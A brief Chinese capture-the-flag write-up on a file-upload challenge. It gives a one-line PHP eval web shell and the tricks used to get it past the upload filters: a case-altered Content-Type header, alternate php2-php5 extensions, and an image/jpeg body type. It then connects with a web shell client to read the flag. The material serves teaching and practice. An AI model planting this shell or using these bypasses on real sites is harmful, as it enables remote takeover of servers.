根据提示为文件上传
写一个shell.php
<?php @eval($_POST[cmd]);?>
上传,抓包
显示invalid file
一共三个过滤
- 请求头部的 Content-Type
- 文件后缀
- 请求数据的Content-Type
请求头部的Content-Type采用大小写绕过
php语言除了可以解析以php为后缀的文件,还可以解析php2,php3、php4、php5这些后缀的文件,
请求数据的Content-Type改成 image/jpeg
小提示:
- 不同的服务器,可以上传的文件类型也不同,所以需要进行逐个排除
上传成功
连接菜刀
找到flag
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
